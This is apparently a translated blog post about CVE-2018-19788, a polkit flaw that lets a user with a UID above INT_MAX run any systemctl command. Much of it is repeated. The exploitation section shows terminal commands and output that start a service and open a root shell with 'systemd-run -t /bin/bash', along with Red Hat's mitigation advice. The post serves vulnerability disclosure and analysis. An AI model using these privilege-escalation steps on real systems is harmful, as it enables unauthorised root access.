Unprivileged Linux users with UID> INT_MAX can execute any command.
Sit down, I have news that shocks you now ...
There is an overt vulnerability in Linux operating systems that allows a user with low privileges to execute any systemctl command (and even become root - translator’s comment) if its UID is greater than 2147483647.
The described vulnerability, monitored as CVE-2018-19788, is in the PolicyKit library (also known as polkit ) version 0.115, pre-installed on most popular Linux distributions, including Red Hat, Debian, Ubuntu, and CentOS. Polkit is a tool in UNIX-like systems that is used to define policies and provide access to unprivileged processes to privileged ones. Unlike “sudo”, it does not give the user a process of administrative rights, but allows you to precisely control what is allowed and what is prohibited.
')
The vulnerability exists due to an error in checking PolicyKit rights requests for any user with a UID greater than INT_MAX. Where INT_MAX is a constant that stores the maximum value of an integer integer variable, which is 2147483647 (in hexadecimal 0x7FFFFFFF).
Thus, if we create an account with any UID exceeding the INT_MAX value, the PolicyKit component will allow you to successfully execute any systemctl command.
Twitter security researcher Rich Mirch, who introduced himself as “ 0xm1rch, ” released a proof-of-concept (PoC) exploit to successfully demonstrate a vulnerability that requires a user with a UID of 4,000,000,000.
Red Hat recommends that system administrators not allow any negative UID or UID greater than 2147483646 to mitigate the problem before the patch is released.
The first way is simply via systemctl. I created a user with a large UID, then tried to start apache2:
1) to start checked that he is lying
2) tried to run, but got an error
3) but then made sure that he still started
The second way is to run bash through systemd. I executed the following command, created a text document in the root fs, added a line to it, and checked the result
While experimenting in my ubunt, I discovered another pattern: if you enter account settings under a user with such a UID, then all settings are unlocked, which allows you to edit / delete any users.
The question remains as to how to “cause” the appearance on the victim host of the user with such a UID, and does this bug really pose a threat?
There is an overt vulnerability in Linux operating systems that allows a user with low privileges to execute any systemctl command (and even become root - translator’s comment) if its UID is greater than 2147483647.
The described vulnerability, monitored as CVE-2018-19788, is in the PolicyKit library (also known as polkit ) version 0.115, pre-installed on most popular Linux distributions, including Red Hat, Debian, Ubuntu, and CentOS. Polkit is a tool in UNIX-like systems that is used to define policies and provide access to unprivileged processes to privileged ones. Unlike “sudo”, it does not give the user a process of administrative rights, but allows you to precisely control what is allowed and what is prohibited.
')
The vulnerability exists due to an error in checking PolicyKit rights requests for any user with a UID greater than INT_MAX. Where INT_MAX is a constant that stores the maximum value of an integer integer variable, which is 2147483647 (in hexadecimal 0x7FFFFFFF).
Thus, if we create an account with any UID exceeding the INT_MAX value, the PolicyKit component will allow you to successfully execute any systemctl command.
Twitter security researcher Rich Mirch, who introduced himself as “ 0xm1rch, ” released a proof-of-concept (PoC) exploit to successfully demonstrate a vulnerability that requires a user with a UID of 4,000,000,000.
Red Hat recommends that system administrators not allow any negative UID or UID greater than 2147483646 to mitigate the problem before the patch is released.
Several methods of exploitation
The first way is simply via systemctl. I created a user with a large UID, then tried to start apache2:
1) to start checked that he is lying
$ systemctl status apache2 ● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: Drop-In: /lib/systemd/system/apache2.service.d └─apache2-systemd.conf Active: inactive (dead) 2) tried to run, but got an error
$ systemctl start apache2 (process:2820): GLib-GObject-WARNING **: 00:42:35.586: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint' ** ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0) 3) but then made sure that he still started
$ systemctl status apache2 ● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: Drop-In: /lib/systemd/system/apache2.service.d └─apache2-systemd.conf Active: active (running) since Tue 2018-12-11 00:42:35 +04; 2s ago Process: 2825 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCE Main PID: 2829 (apache2) Tasks: 55 (limit: 4526) CGroup: /system.slice/apache2.service ├─2829 /usr/sbin/apache2 -k start ├─2830 /usr/sbin/apache2 -k start └─2831 /usr/sbin/apache2 -k start The second way is to run bash through systemd. I executed the following command, created a text document in the root fs, added a line to it, and checked the result
$ systemd-run -t /bin/bash (process:3947): GLib-GObject-WARNING **: 01:24:30.023: value "-2147483646" of type 'gint' is invalid or out of range for property 'uid' of type 'gint' ** ERROR:pkttyagent.c:175:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0) Running as unit: run-u107.service Press ^] three times within 1s to disconnect TTY. # echo hello > /test.txt # cat /test.txt hello While experimenting in my ubunt, I discovered another pattern: if you enter account settings under a user with such a UID, then all settings are unlocked, which allows you to edit / delete any users.
The question remains as to how to “cause” the appearance on the victim host of the user with such a UID, and does this bug really pose a threat?
Source: https://habr.com/ru/post/432610/
All Articles